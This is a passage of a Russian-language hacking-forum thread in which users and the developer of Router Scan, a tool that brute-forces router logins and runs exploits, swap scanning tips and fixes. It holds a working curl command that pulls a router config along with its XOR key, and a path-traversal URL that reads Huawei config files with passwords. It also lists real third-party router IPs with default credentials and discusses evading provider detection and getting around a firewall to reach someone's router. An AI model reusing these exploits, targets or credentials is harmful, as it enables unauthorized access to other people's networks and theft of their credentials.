PDA

Просмотр полной версии : прога Router Scan


Страницы : 1 2 3 4 5 6 7 8 9 [10] 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

TARGAS
11.10.2016, 15:49
Киньте кому не трудно, порты для скана в RS, для роутеров. У меня в проге стоят 80, 8080, 1080. Может я что пропустил?



Заходишь на 3wifi в статистику и смотришь порты частоиспользуемые

binarymaster
11.10.2016, 21:58
глянь пожалуйста и QBRы на 161 порту, логин пароль подбирает, но данные не вытаскивает с них. или это только у одного меня так?



Добавил сигнатуры.



а на ZTE, про которые ныл несколькими постами выше, пароль не перебирает, хотя пишет, что admin admin подходит. роутер блочится на 60 сек после трех неправильных вводов. но и даже с верным паролем не парсятся с него данные. к сожалению, открытого снаружи не могу найти пока


Пофиксил.

Felis-Sapiens
11.10.2016, 22:06
Я тут написал скрипт для просмотра конфигурационных файлов с сигнатурой 'COMPCS' (такие, в том числе, и у этих QBR), может кому пригодится:

https://mega.nz/#!qoQGlJwS!ym7dhnElsW4UqW6227Bq2JNb0tzRc92heU7nKFY UxtU

forslay
12.10.2016, 23:54
binarymaster, какое количество портов оптимально указать при сканировании за одну сессию? Указал более 10, RS вылетел через 2 минуты (использую последний ваш билд), далее запустил rs с 4 портами, как итог полёт нормальный.

Может это зависит от настроек max.threads и timeout (ms)? Антивирус, фаервол отключены, фильтрации DNS и межсетевые экраны в маршрутизаторе отключены. Канал 100mb/s, пользуюсь им один. Сканирую IP внутренней сетки провайдера (172.xxx.xxx.xxx).

Может предложите наиболее оптимальные настройки исходя из вашего опыта? Спасибо.

binarymaster
13.10.2016, 00:51
binarymaster, какое количество портов оптимально указать при сканировании за одну сессию?



Я иногда гоняю с 5-ю портами 8080,80,1080,443,8443.

Сомневаюсь, что вылеты из-за их количества. Но по возможности проверю. А какие порты указывали вы?

forslay
13.10.2016, 02:56
Я иногда гоняю с 5-ю портами 8080,80,1080,443,8443.

Сомневаюсь, что вылеты из-за их количества. Но по возможности проверю. А какие порты указывали вы?



80

8080

443

1080

81

8088

10000

9090

61080

8081

88

13004

1025

8888

8000

8443

82

65080

9999

С количеством явно перебрал Просто я полагал, что процесс тем самым должен замедлиться, что и произошло по факту, это логично, но не думал, что программа закроется.

denlenin
13.10.2016, 05:28
Добавил сигнатуры.

Пофиксил.






Да, эти всё ещё некорректно парсятся. Но сейчас я на работе, пофиксить смогу только вечером, если эти штуки не оффнутся.



так и не нашел открытой снаружи точки

http://rgho.st/7wmzJsYYQ - zte h298n через Charlies

сорри за наглость, но когда примерно ждать следующего релиза со всеми фиксами?

tisma
13.10.2016, 10:03
Уважаемые! Подскажите, пожалуйста. Провайдер как-то может увидеть что сканятся айпишники этой прогой? Если я например, грубо говоря, поставлю сканить с 0.0.0.0 по 255.255.255.255 он будет например месяц сканить, где-то это как-то может всплыть? А то придут злые дяди от провайдера или еще кто недовольный, что я им всю сетку забил

Payer
13.10.2016, 10:56
Провайдер как-то может увидеть что сканятся айпишники этой прогой?



Вообще ему пох, кроме жалоб.

Если поступит абуза, что с вашей сети идет подозрительный скан портов - провайдер обязан вас отключить.

Или отключат всего провайдера.

binarymaster
13.10.2016, 11:14
С количеством явно перебрал


На некоторых их этих портов могут быть другие службы, работающие по другим протоколам, не HTTP.



так и не нашел открытой снаружи точки

http://rgho.st/7wmzJsYYQ - zte h298n через Charlies



Пофиксил уже.



сорри за наглость, но когда примерно ждать следующего релиза со всеми фиксами?



Ну мне в принципе не лень выкладывать сборки после каждого коммита... это так срочно?

denlenin
13.10.2016, 14:51
Ну мне в принципе не лень выкладывать сборки после каждого коммита... это так срочно?



да не срочно просто боязно, вдруг проект снова заморозится на год ))

binarymaster
13.10.2016, 14:56
да не срочно просто боязно, вдруг проект снова заморозится на год ))



Это вряд ли. Я набрал небольшую команду, и разработка со скрипом, но двинулась с места.

Upsurt
13.10.2016, 15:19
Tenda 11N Wireless Router

http://87.118.142.197:8080

admin:admin

Felis-Sapiens
13.10.2016, 16:00
Tenda 11N Wireless Router

http://87.118.142.197:8080

admin:admin



Поправил

binarymaster
13.10.2016, 21:46
вот по первому сканированию tcp. вроде какие-то порты обнаружились.



Похоже на хост под управлением Windows, но за активным брандмауэром.

sha9
14.10.2016, 09:52
Похоже на хост под управлением Windows, но за активным брандмауэром.



вот это-то и непонятно.до того как поговорил с сисадмином роутер парсился свободно роутерсканом. не было никаких активных брандмауэров.да и после разговора железо не менялось. вот и не могу понять, что он сделал :-( подозревал проброс портов. но видимо не то. он, мне кажется, что-то намутил с роутером. но вот что? лазил по настройкам аналогичного роутера и не нашел ничего похожего. а может просто не увидел ввиду пробела в образовании

попробую еще по udp сканированию. может что-то еще подскажет :-(

sha9
14.10.2016, 10:07
Похоже на хост под управлением Windows, но за активным брандмауэром.



спасибо за подсказку. взялся за матчасть и кажется что-то начал понимать. роутер ни при чем. ключевое слово - активный боандмауэр теперь вопрос в том, как его обойти, чтобы добраться до роутера и включить вайфай

localhost
15.10.2016, 09:27
binarymaster спасибо что возобновили развитие этой программы =)

есть предложение - имеющийся опция фильтрации хостов, не очень удобная, она позволяет только отсеивать не нужные, а если мне нужно искать конкретные роутеры, то фильтром можно выделить только 1 единственный. Хотелось бы иметь возможность настроить - сначало идет определение устройства всеми возможными способами затем сравнить, его со списком указанных в фильтре, и только после этого начинать его брутить и применять эксплойты ! Это было бы просто здорово =) ! И еще - работа с большими списками хостов, сейчас в прогу можно загрузить не более 10 000 хостов, если сканить 100ни или миллионы хостов, то это не удобно =) Просто я сначало прохожу списки сетей masscanом затем полученый список вставляю в роутер сканер, а в этом списке могут быть миллионы хостов =)

А еще - с нетерпением ждем linux версию ! =) Спасибо!

binarymaster
15.10.2016, 10:49
есть предложение - имеющийся опция фильтрации хостов, не очень удобная, она позволяет только отсеивать не нужные, а если мне нужно искать конкретные роутеры, то фильтром можно выделить только 1 единственный. Хотелось бы иметь возможность настроить - сначало идет определение устройства всеми возможными способами затем сравнить, его со списком указанных в фильтре, и только после этого начинать его брутить и применять эксплойты ! Это было бы просто здорово =)



То есть режим "белого списка"? Сейчас фильтр только отсеивает по признакам, да.



И еще - работа с большими списками хостов, сейчас в прогу можно загрузить не более 10 000 хостов



Можно загрузить более 10 000.

Они просто не выводятся в список, вместо этого выводится предупреждение.

localhost
15.10.2016, 11:26
То есть режим "белого списка"? Сейчас фильтр только отсеивает по признакам, да.



Да, "белый список", только не с поиском по содержимому, заголовкам и пр. а только после того как прога сама определит устройство всеми (!) способами



Можно загрузить более 10 000.

Они просто не выводятся в список, вместо этого выводится предупреждение.



Попробовал импортировать список из файла, весом немного больше 7мБ, 500 000 хостов, прога зависла в обработке, через 20 мин. убил процесс надоев ждать завершения =( Хотя к примеру notepad++ файл весом в 500мБ (!) открывает всего за несколько секунд )

nmap вообще открывает любой файл без задержек, хоть 5 миллионов хостов =)

binarymaster
15.10.2016, 11:37
Попробовал импортировать список из файла, весом немного больше 7мБ, 500 000 хостов, прога зависла в обработке, через 20 мин. убил процесс надоев ждать завершения =(



Попробуйте не использовать встроенный редактор диапазонов, а открыть файл ranges.txt, отредактировать его, и после запустить RS.

Компоненты Delphi не заточены под большие объёмы текста.

localhost
15.10.2016, 11:53
Попробуйте не использовать встроенный редактор диапазонов, а открыть файл ranges.txt, отредактировать его, и после запустить RS.



Так намного быстрее, спасибо =)

Еще - настройка вывода результатов - сохранять в файл с возможностью выбора столбцов, к примеру я хочу только - ip, port, authorization, device type, при том в каком порядке я укажу в таком они и будут =) + выбор разделителя

Стоить ли ждать linux версию ?

Еще, активируйте пожалуйста меню Rescan\Reset на вкладке Good Results =) а то искать этот ip на вкладке Realtime status, если нужно, просто не реально =)

Замечал иногда пользователи используют пароль от роутера в качестве WPA ключа для wifi, иногда роутер скан может узнать key от роутера, тогда можно зайти на роутер при помощи admin: =)

soze747
15.10.2016, 14:47
Ограничение на длинну словаря в RS есть?

binarymaster
15.10.2016, 14:51
Еще - настройка вывода результатов - сохранять в файл с возможностью выбора столбцов, к примеру я хочу только - ip, port, authorization, device type, при том в каком порядке я укажу в таком они и будут =) + выбор разделителя



Такие вещи, пожалуйста, через Excel.



Стоить ли ждать linux версию ?


Определённо.



Еще, активируйте пожалуйста меню Rescan\Reset на вкладке Good Results =) а то искать этот ip на вкладке Realtime status, если нужно, просто не реально =)



Технически невозможно.



Замечал иногда пользователи используют пароль от роутера в качестве WPA ключа для wifi, иногда роутер скан может узнать key от роутера, тогда можно зайти на роутер при помощи admin:<значение key> =)



Эта фича уже используется RS'ом.



Ограничение на длинну словаря в RS есть?



Нет, но чем больше, тем дольше будет перебор => придётся повышать лимиты жизни потоков.

localhost
15.10.2016, 15:25
<div class="quote">
То есть режим "белого списка"? Сейчас фильтр только отсеивает по признакам, да.
</div>


Да, "белый список", только не с поиском по содержимому, заголовкам и пр. а только после того как прога сама определит устройство всеми (!) способами



Это тоже можно не ждать ?

binarymaster
15.10.2016, 15:36
Да, "белый список", только не с поиском по содержимому, заголовкам и пр. а только после того как прога сама определит устройство всеми (!) способами



Белый список скорее всего будет. По второй части - сложнее, но тоже возможно.

soze747
15.10.2016, 15:55
Информация к размышлению:

Zyxel Keenetix Giga 2 NDMS v2.06(AAFS.2)C0 . Мой личный роутер.

Не ломаеться по словарям с моими пассом-логином. Ломаеться только если ввести данные в Use credentials.

VladimirV
15.10.2016, 20:12
Информация к размышлению:

Zyxel Keenetix Giga 2 NDMS v2.06(AAFS.2)C0 . Мой личный роутер.

Не ломаеться по словарям с моими пассом-логином. Ломаеться только если ввести данные в Use credentials.



Пару логин и пароль, ввели через таб?

Словарь пар используете тот в который вписали свой логин-пароль?

soze747
15.10.2016, 21:01
Пару логин и пароль, ввели через таб?

Словарь пар используете тот в который вписали свой логин-пароль?



Да , TPlink сразу пробивает а Zyxel держиться.

RomanxD
15.10.2016, 22:06
Zyxel Keenetix Giga 2 NDMS v2.06(AAFS.2)C0 . Мой личный роутер. Не ломаеться по словарям с моими пассом-логином. Ломаеться только если ввести данные в Use credentials.



FAQ: 2.5.

Q: Я использую функцию Use credentials, и пароль к роутеру подбирается. Но если я её отключаю, и добавляю пару логин/пароль в файлы словарей auth_basic.txt и/или auth_digest.txt, то пароль к роутеру уже не подбирается. Почему так?

A: Скорее всего, ваш роутер не использует Basic/Digest аутентификацию. Для таких роутеров необходимо использовать функцию Use credentials.

binarymaster
15.10.2016, 23:13
A: Скорее всего, ваш роутер не использует Basic/Digest аутентификацию. Для таких роутеров необходимо использовать функцию Use credentials.



ZyXEL Keenetic Giga II (NDMS v2.06(AAFS.2)C0) использует Digest-аутентификацию, тут что-то другое.



ломаеться






держиться



Пожалуйста... не причиняйте боль моим глазам.

Вы пароль свой добавили только в auth_basic, или в оба словаря?

soze747
16.10.2016, 00:21
ZyXEL Keenetic Giga II (NDMS v2.06(AAFS.2)C0) использует Digest-аутентификацию, тут что-то другое.

Пожалуйста... не причиняйте боль моим глазам.

Вы пароль свой добавили только в auth_basic, или в оба словаря?



В оба.

sha9
19.10.2016, 20:59
роутерскан нашел такую вот штуковину mymon (pass - admin:admin). нагуглил mymon(MySQL-Monitor). но что-то туплю. что это за хр....ь? то, что связано со скулями - понятно. но где применяется это дело, может кто подскажет?

DSL2650NRU
25.10.2016, 00:08
Есть роутеры adsl tp-link, которые прога определяет как WebServer/1.0 UPnP/1.0 и не пробивает на стандартную пару admin admin. А если зайти по ip, тогда можно авторизоваться.

V777
25.10.2016, 01:11
Есть роутеры adsl tp-link, которые прога определяет как WebServer/1.0 UPnP/1.0 и не пробивает на стандартную пару admin admin. А если зайти по ip, тогда можно авторизоваться.



Ты давай айпи , а мастера если получится то допилят ...По конкретней плис

DSL2650NRU
25.10.2016, 08:19
Ты давай айпи , а мастера если получится то допилят ...По конкретней плис



100.98.181.150 100.98.90.104 Это локалка ростелекома.

Felis-Sapiens
25.10.2016, 10:17
100.98.181.150 100.98.90.104 Это локалка ростелекома.



Ну и толку от них? Прочтите раздел справки "Добавление новых устройств в поддержку".



Есть роутеры adsl tp-link, которые прога определяет как WebServer/1.0 UPnP/1.0 и не пробивает на стандартную пару admin admin



Добавил, но не факт что те, которые вы просили.

binarymaster
26.10.2016, 21:51
Я посмотрел - из под user:user можно скачать конфиг. Для этого логинимся под user:user и отправляем POST-запрос, например в curl:


curl "http://IP:PORT/cfg_op.ccp" --data "ccp_act=save" > cfg.bin
Конфиг зашифрован, если так можно выразиться. Скачав прошивку, нашёл, что это просто xor с 0xABCD1234



Добавил эксплойт в RS.

readiv
26.10.2016, 23:42
Вечер добрый. Вот здесь https://forum.antichat.ru/threads/398971/page-119#post-4000872 писали про ZTE. А можно как нибудь новую версию получить. А то наткнулся сегодня на них. И кстати пароли у них support:support

http://image.prntscr.com/image/ea350d0b42794c0eb8659c2e1e5d7650.png

readiv собака mail.ru

binarymaster
27.10.2016, 01:14
А можно как нибудь новую версию получить. А то наткнулся сегодня на них.



http://rgho.st/7MH9X2KPy

Пароль - название форума.

readiv
27.10.2016, 02:01
Не работает

http://image.prntscr.com/image/bc52197a4ee24c759220e3534784e843.png

У того что admin:admin на самом деле пароль support:support и WiFi на нем есть

Вот список в иекстовом виде


212.106.224.163
212.106.225.190
212.106.237.182
212.106.241.175
212.106.243.77
212.106.252.176
95.22.24.109
95.22.31.20
95.22.31.153
95.22.37.114
95.22.55.79
95.22.62.244
95.22.149.49
95.22.151.44
95.22.160.45
95.22.162.231
95.22.166.6

denlenin
27.10.2016, 05:27
http://rgho.st/7MH9X2KPy

Пароль - название форума.



вот спасибо! qtech qbr победили! с ZTE проблему подтверждаю. вычитывается только название устройства

http://image.prntscr.com/image/def991d870c447cb830ff7a66514ef55.jpg

Kakoluk
27.10.2016, 10:31
http://rgho.st/7MH9X2KPy

Пароль - название форума.



А можно на другой файлообменник скинуть?

CRACK211
27.10.2016, 11:26
на роутерах Thomson Router стоят такие пароли adfabfa7ca09378c4b769466b7 ? или это зашифрованный пароль? хеш или еще что?

VladimirV
27.10.2016, 11:27
на роутерах Thomson Router стоят такие пароли adfabfa7ca09378c4b769466b7 ? или это зашифрованный пароль? хеш или еще что?



Это пароли.

binarymaster
27.10.2016, 11:39
У того что admin:admin на самом деле пароль support:support и WiFi на нем есть



Используйте "Use credentials".

Он после нескольких попыток авторизации блокируется.



с ZTE проблему подтверждаю. вычитывается только название устройства



У них есть что-то ещё? На тех ZTE, к которым у меня был доступ, беспроводного адаптера не было.

Сейчас я на работе, смогу посмотреть лишь вечером.



А можно на другой файлообменник скинуть?



Можно, но зачем?

binarymaster
27.10.2016, 14:39
C "Use credentials" все равно не вычитывает



Но авторизуется. Уже понял.

denlenin
27.10.2016, 16:51
У них есть что-то ещё? На тех ZTE, к которым у меня был доступ, беспроводного адаптера не было.



есть там всё-всё-всё. тут выкладывал слепок через charlies

Kakoluk
27.10.2016, 18:36
Можно, но зачем?



Уже незачем. Просто с утра не смог скачать, видимо у них сервис подвис. Как то так.

binarymaster
27.10.2016, 22:10
У того что admin:admin на самом деле пароль support:support и WiFi на нем есть



Пофиксил. Теперь и support:support пробует, и инфу достаёт.

readiv
28.10.2016, 00:58
А можно пофикшеную как нибудь получить?

binarymaster
28.10.2016, 01:19
А можно пофикшеную как нибудь получить?



Как-нибудь.

http://rgho.st/8ntTt5Jlp

denlenin
28.10.2016, 05:20
Пофиксил. Теперь и support:support пробует, и инфу достаёт.



вот спасибище! заработало. только как-то подозрительно долго инфа из ZTE вытягивается и перебор паролей стал долго происходить на qbr или мне кажется?

в предыдущих билдах прям отлетало, а тут при 80ти потоках - 40-50 постоянно висят в getting info и трай то логин (сканю локалку с qbr и zte).

о! попробовать пароли в файле повыше поставить, роутер скан же не радномно их перебирает?

upd разобрался, отсортировал пароли как надо в файлах - процесс ускорился в разы

Shimura
28.10.2016, 11:38
40-50 постоянно висят в getting info и трай то логин



Было один раз похожее в какой-то из первых новых тестовых версий. При первом сканировании всё было без запинок. Залив насканированное на 3wifi не отходя от кассы взялся сканировать другой диапазон (закрыв и открыв рскан заново) и рскан начал почему-то застревать на некоторых роутерах. При паузе данные с роутеров нормально допарсивались, но после возобновления сканирования всё равно появлялись новые "тормознутые" которые часто выдавали timed out и не ресканились пока снова не поставишь на паузу. Подозреваю, что дело было в том, что моя машина была подключена к сети через wi-fi, либо проблема была в самом диапазоне

CRACK211
29.10.2016, 11:50
Есть роутер dir-615 у него две учетные записи user и Admin при сканировании rs показывает пароль от user, точнее пароля на user нету, но rs все показывает. А для admin даже не пытается найти пароль.Вопрос нельзя сделать что бы rs искал пароль и от admin?

Triton_Mgn
29.10.2016, 13:05
Как-нибудь.

http://rgho.st/8ntTt5Jlp



A то, что Felis-Sapiens в последнее время добавлял и фиксил в этой версии присутствует?

binarymaster
29.10.2016, 14:42
Есть роутер dir-615 у него две учетные записи user и Admin при сканировании rs показывает пароль от user, точнее пароля на user нету, но rs все показывает. А для admin даже не пытается найти пароль.Вопрос нельзя сделать что бы rs искал пароль и от admin?



Пункт FAQ 2.6.



A то, что Felis-Sapiens в последнее время добавлял и фиксил в этой версии присутствует?



Да.

tamer010151
02.11.2016, 01:51
http://rgho.st/8ymVBSpyl

tamer010151
02.11.2016, 01:54
http://store2.up-00.com/2016-11/1478037077531.jpg

binarymaster
02.11.2016, 11:13
@tamer010151 (https://forum.antichat.xyz/members/266514/) ну и зачем все модули сканирования включать? Боитесь что-то пропустить?

А ещё - версия на скриншоте определённо устарела, ZTE я исправлял.

Payer
02.11.2016, 11:21
определённо устарела, ZTE я исправлял.



Вроде там с авторизацией проблема. Пароля нет известного, по таймауту все и заканчивается.



зачем все модули сканирования включать?



Вот так всегда, непонимаючи шаловливыми руками наклацаем и спрашиваем.

binarymaster
02.11.2016, 11:23
Вроде там с авторизацией проблема. Пароля нет известного, по таймауту все и заканчивается.



Ну вот у меня например 197.164.81.40 хоть и не логинится, но крякозябр в таблицу не пишет.

Ещё обратил внимание, что диапазон в целом тормозной, ширина канала очень мала на стороне сканируемого провайдера. Таким большим количеством потоков его нельзя сканировать, можно вообще положить.

RomanxD
02.11.2016, 11:38
binarymaster, заметил что ZTE Router (locked for 59 sec.) а пароль подбирается дальше и другие уязвимости проверяются.

VladimirV
02.11.2016, 11:45
ну и зачем все модули сканирования включать? Боитесь что-то пропустить?






Вот так всегда, непонимаючи шаловливыми руками наклацаем и спрашиваем.


Там еще два RS запущено.

readiv
03.11.2016, 05:14
У меня тут нарисовалась огромная куча Huawei. Предположительно это HG532e. По нему вот нашлось https://github.com/ud2/advisories/tree/master/embedded/huawei/cve-2015-7254

За пару минут нашел кучу устройств с открытым 37215. Это можно как то эксплуатировать?

http://image.prntscr.com/image/60406f1048824fc5bfca951565507232.png

Felis-Sapiens
03.11.2016, 16:57
Эксплуатация возможна. По URL: http://IP:37215/icon/../../../var/curcfg.xml считывается текущий конфиг со всеми паролями и т.д.



Интересно от чего зависит наличие /var/curcfg.xml. Я раньше сколько ни пробовал, /etc/inittab скачивается, а curcfg.xml нет.

localhost
03.11.2016, 18:23
binarymaster а фильтрация по правилам "белого" списка будет ?

binarymaster
03.11.2016, 22:27
binarymaster а фильтрация по правилам "белого" списка будет ?


https://forum.antichat.ru/posts/4002151

Sh ish
04.11.2016, 13:35
RSTest.7z (1.3 МБ)

Загружен 9 дней наза

Файл удален

Можно перезолить?

binarymaster
04.11.2016, 14:46
RSTest.7z (1.3 МБ)

Загружен 9 дней наза

Файл удален

Можно перезолить?



???

https://forum.antichat.ru/posts/4006682

Mednik
05.11.2016, 11:18
http://images.vfl.ru/ii/1478328329/03eeb2d0/14810984_m.png

http://images.vfl.ru/ii/1478329638/69baced1/14811118_m.png

Обратил внимание нет авторизации и MAC , делал рескан, так же без результата .

binarymaster
05.11.2016, 15:36
Обратил внимание нет авторизации и MAC , делал рескан, так же без результата .



Это нормально. Эксплойт смог добыть данные точки доступа, но доступа к BSSID при таком раскладе нет.

RS всегда добывает то, что способен добыть. Посылая подобные скриншоты, предже всего задавайте себе вопрос "А должен ли RS добыть что-то ещё? Если да, каким образом?"

На второй вопрос ответ должен быть чисто техническим, в виде алгоритма получения данных, а также проверенным лично.

readiv
05.11.2016, 20:02
Стоит ли надеяться на реализацию https://forum.antichat.ru/threads/398971/page-122#post-4008991 ?

stasstv
05.11.2016, 20:57
Отвечаю сам себе. Эксплуатация возможна. По URL: http://IP:37215/icon/../../../var/curcfg.xml считывается текущий конфиг со всеми паролями и т.д.



Как вы прикручиваете этот скрипт к RouterScan?

readiv
05.11.2016, 23:28
Никак. Если уважаемый binarymaster добавит его в RS, тогда будет можно. А пока можете сами поупражняться в программировании на python

CRACK211
06.11.2016, 00:27
http://anticlerk.ru/wp-content/uploads/2013/06/%D0%AF-%D1%82%D0%B0%D0%BA-%D0%B4%D1%83%D0%BC%D0%B0%D1%8E.jpg



Как после сканирования, сохранить отдельно только пароли ???



Отключить отображение ненужных столбцов bssid, essid, wps pin, ip и т.п. Перейти в good resultat и сохранить в файл. Main menu => choose settings и убирайте не нужные столбцы

Kakoluk
11.11.2016, 20:24
А можно маленькое изменение в интерфейсе?

Что бы в закладке "Good Results", сочетание +R (рескан) тоже работало?

Часто бывает, что нужно из гудов пересканировать(завис роутер например, с таймаутом), а приходится лезть и искать его в закладке "RealTime Stats"...

Неудобно однако.

TARGAS
11.11.2016, 20:34
Ответ на Ваш вопрос https://forum.antichat.ru/threads/398971/page-71#post-3910839

binarymaster
12.11.2016, 15:35
Но хотя бы сделать поиск ip из good в RealTime можно?



А вот это кстати да, хорошая мысль. Единственное НО: записи могут повторяться, причём полностью.

Kakoluk
12.11.2016, 15:59
А вот это кстати да, хорошая мысль. Единственное НО: записи могут повторяться, причём полностью.



На наш страх и риск. Оружейник не виноват в том, что его ножом, ревнивый муж зарезал супругу на кухне.

Мне кажется, что если учитывать в выборке фильтр по пингу, вероятность дубля будет сведена к минимуму.

violino
13.11.2016, 20:27
Доброго времени суток..

Простите за вопрос. А куда добавлять сканы?

Позабыла совсем адрес. Раньше добавляла, потом бросила.Хочу продолжать, а куда - подскажите пожалуйста!!!

Заранее благодарна!

TARGAS
13.11.2016, 20:32
Доброго времени суток..

Простите за вопрос. А куда добавлять сканы?

Позабыла совсем адрес. Раньше добавляла, потом бросила.Хочу продолжать, а куда - подскажите пожалуйста!!!

Заранее благодарна!



http://3wifi.stascorp.com/

violino
14.11.2016, 10:44
А еще я прошу прощения, а сайт лежит,да?

И, еще столкнулась с такой проблемой, что не работает программа. Запускаю, а кнопки не реагируют. Это версия 2.53.

Может, спуститься на 2.52?

Triton_Mgn
14.11.2016, 14:12
А еще я прошу прощения, а сайт лежит,да?

И, еще столкнулась с такой проблемой, что не работает программа. Запускаю, а кнопки не реагируют. Это версия 2.53.

Может, спуститься на 2.52?



Скачать заново архив с сайта stascorp.com и распаковать.

erwerr2321
14.11.2016, 14:17
А еще я прошу прощения, а сайт лежит,да?



Какой сайт? Нет! У нас всё стоит и работает!

vince666999
14.11.2016, 16:31
Как открыть архив с программой RsTest (router scan) скачал по ссылке http://rgho.st/8ntTt5Jlp

на архиве пароль, где его взять? Прога платная?

Спасибо

atlas28
14.11.2016, 16:33
Как открыть архив с программой RsTest (router scan) скачал по ссылке http://rgho.st/8ntTt5Jlp

на архиве пароль, где его взять? Прога платная?

Спасибо



Пароль - название форума.

erwerr2321
14.11.2016, 16:37
Пароль - название форума.



Ну зачеееем????

henri2002
14.11.2016, 16:48
Как открыть архив с программой RsTest (router scan) скачал по ссылке http://rgho.st/8ntTt5Jlp

на архиве пароль, где его взять? Прога платная?

Спасибо



если не знаете, может оно вам не надо.

violino
14.11.2016, 18:59
не могу скачать ни в хроме, ибо http://prntscr.com/d75prv

не могу скачать в эксплорере, ибо http://prntscr.com/d75q72

А ведь так не должно быть на свете!

Можно в личку ссылку на файлообменник, пожалуйста!!!

binarymaster
14.11.2016, 19:20
не могу скачать ни в хроме, ибо http://prntscr.com/d75prv

не могу скачать в эксплорере, ибо http://prntscr.com/d75q72

А ведь так не должно быть на свете!

Можно в личку ссылку на файлообменник, пожалуйста!!!



Боже мой... и это я вижу здесь, на Античате.

Во-первых, IE качать Роутер Скан не желательно. Вообще не желательно им что-либо качать, он часто недокачивает.

Во-вторых, у Chrome помимо "Отменить передачу" есть стрелочка правее. Немного лосьона для прямости рук™, и хром не сможет помешать вам в скачивании файла.

violino
14.11.2016, 19:27
како грубо, однако....

http://prntscr.com/d764jz

http://prntscr.com/d7651z

Payer
14.11.2016, 19:32
грубо, однако....



не нужно оно вам.

если вы в хроме не можете на отдельной вкладке довести скачивание до результата, значит не зря спрятали.

maus
14.11.2016, 20:34
како грубо, однако....

http://prntscr.com/d764jz

http://prntscr.com/d7651z



- попробуй в Хроме: Настройки - Показать дополнительные настройки - Защитить устройство от опасных сайтов (снять флажок).

binarymaster
14.11.2016, 22:03
како грубо, однако....

http://prntscr.com/d764jz

http://prntscr.com/d7651z



Это я ещё вежливо ответил, можно сказать, с иронией. Раньше там же был пункт меню "Разрешить загрузку".

Я обычно через Ctrl+J иду в список загрузок и там разрешаю вручную.



Настройки - Показать дополнительные настройки - Защитить устройство от опасных сайтов (снять флажок)



Про галку не знал, спасибо.

maus
14.11.2016, 22:16
Про галку не знал, спасибо.


- век живи век учись...

- что же вы так грубо с девушкой, тем более с начинающим "хакером"? она бедная только через ТОР скачала.

violino
14.11.2016, 22:25
вовсе не надо так!

Вы сами сказали - "век живи- век учись".

Так что я научилась)))

Ну не получилось нормально, нет лосьона))))

Бывает!

sha9
14.11.2016, 22:26
- век живи век учись...

- что же вы так грубо с девушкой, тем более с начинающим "хакером"? она бедная только через ТОР скачала.



а мне кажется - правильно.расшаркиваться перед дамой можно в салунах. а если она полезла в воду, не зная броду - то тут не важно девушка или типа пацан такие "начинающие хакеры" уже добились того, что провайдеры что-то подозрительно сильно возбудились

sha9
14.11.2016, 22:28
вовсе не надо так!

Вы сами сказали - "век живи- век учись".

Так что я научилась)))

Ну не получилось нормально, нет лосьона))))

Бывает!



пользуйтесь лисой.меньше проблем будет.и таких вопросов

violino
14.11.2016, 22:29
ой все!

maus
14.11.2016, 22:29
пользуйтесь лисой.меньше проблем будет.и таких вопросов



- каждый браузер нужно чуть-чуть поднастроить.

maus
14.11.2016, 22:30
а мне кажется - правильно.расшаркиваться перед дамой можно в салунах. а если она полезла в воду, не зная броду - то тут не важно девушка или типа пацан такие "начинающие хакеры" уже добились того, что провайдеры что-то подозрительно сильно возбудились



- можно было и в ГУГЛ послать а не грубить, дженпельмени.

maus
14.11.2016, 22:32
ой все!


- лиса он имеет ввиду Mozilla Firefox...браузер такой тоже есть.

violino
14.11.2016, 22:34
я не начинающий(((

Просто была под другим ником тут.

Очень давно уже добавляю инфу в базу.

А что тут ... промахнулась - бывает. Невозможно знать все.

Про расшаркивания - речь не шла. Сами не все знаете.

Можно нормально помочь. Но, видимо.. сложно)

Что ж.

Alexmeh
14.11.2016, 22:40
я не начинающий(((

Просто была под другим ником тут.



Случаем не под этим?

pestoviv, он же Vasiliy37, он же Arnold1024

Или сосед?

sha9
14.11.2016, 22:43
- можно было и в ГУГЛ послать а не грубить, дженпельмени.



вы считаете, что послать.....по гуглу - это тактичнее ?

vince666999
14.11.2016, 22:44
Как открыть архив с программой RsTest (router scan) скачал по ссылке http://rgho.st/8ntTt5Jlp

на архиве пароль, где его взять? Прога платная?

Спасибо



Пароль - название форума.



СПАСИБО!

sha9
14.11.2016, 22:47
я не начинающий(((

Просто была под другим ником тут.

Очень давно уже добавляю инфу в базу.

А что тут ... промахнулась - бывает. Невозможно знать все.

Про расшаркивания - речь не шла. Сами не все знаете.

Можно нормально помочь. Но, видимо.. сложно)

Что ж.



не нужно обижаться.мужской половине свойственна агрессивная воинственность природа, знаете-ли

sha9
14.11.2016, 22:48
Может и не девушка, вовсе?



доказательства в студию

vince666999
14.11.2016, 22:51
Ну зачеееем????



вот...жадность то))) ее ведь не спрячешь...)) это мы так на луну не скоро полетим, без помощи друг-другу(я про человечество вцелом)

форум прекрасный, просто я тут недавно, не все элементарные вещи знаю. постигну еще...

Спасибо всем, его наполняющим))

Alexmeh
14.11.2016, 22:53
вот...жадность то))) ее ведь не спрячешь...)) это мы так на луну не скоро полетим, без помощи друг-другу(я про человечество вцелом)

форум прекрасный, просто я тут недавно, не все элементарные вещи знаю. постигну еще...

Спасибо всем, его наполняющим))



Да нет речи о жадности, здесь речь о человеческой лени и невнимательности.

Если почитать тему сначала, то станет понятно.

sha9
14.11.2016, 22:55
вот...жадность то))) ее ведь не спрячешь...)) это мы так на луну не скоро полетим, без помощи друг-другу(я про человечество вцелом)

форум прекрасный, просто я тут недавно, не все элементарные вещи знаю. постигну еще...

Спасибо всем, его наполняющим))



вопрос не в жадности, а внимательности. помощь - помощи тоже рознь. одно дело помочь в существенных вопросах, и другое дело тыкать пальцем в очевидное

vince666999
14.11.2016, 22:57
Мы знаем, 'Пятница'

Народу набежало....



это ж хорошо что народ есть)

про жадность естественно юмор это такой

binarymaster
14.11.2016, 23:44
- можно было и в ГУГЛ послать а не грубить, дженпельмени.






не нужно обижаться.мужской половине свойственна агрессивная воинственность природа, знаете-ли


Вообще хакер - существо бесполое. Да и знакомств здесь никто не ищет, мы все здесь по делу.

violino
15.11.2016, 12:22
эт точно))) знакомств не ищу.

Была под ником paulo.

Но, он поменял пароль.. простите - оно, и пришлось региться)))

А ведь несколько лет была pauloM))) Эх.

Ну,то такое

Я правильно понимаю, когда я загружаю так, то я на самом сайте свою ж статистику посмотреть не могу?( http://prntscr.com/d7gp88

Хотя, не особо важно. Просто лепты в дело.

binarymaster
15.11.2016, 13:20
Была под ником paulo.



Догадывался.



